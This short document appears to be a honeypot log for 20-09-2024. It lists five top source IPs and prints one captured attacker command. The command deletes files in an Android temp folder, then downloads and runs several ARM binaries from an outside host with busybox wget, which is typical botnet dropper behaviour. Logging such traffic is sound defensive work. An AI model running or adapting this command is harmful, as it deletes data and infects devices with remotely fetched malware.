Top 5 IPs for 20-09-2024 :

14.103.44.203
102.223.38.107
125.229.174.39
37.156.28.169
87.120.166.231


Malware Observed:

None



Commands/exploits observed :

cd /data/local/tmp/; rm *; busybox wget http://pen.gorillafirewall.su/arm.nn; chmod +x arm.nn; ./arm.nn arm.android; busybox wget http://pen.gorillafirewall.su/arm5.nn; chmod +x arm5.nn; ./arm5.nn arm5.android; busybox wget http://pen.gorillafirewall.su/arm6.nn; chmod +x arm6.nn; ./arm6.nn arm6.android; busybox wget http://pen.gorillafirewall.su/arm7.nn; chmod +x arm7.nn; ./arm7.nn arm7.android
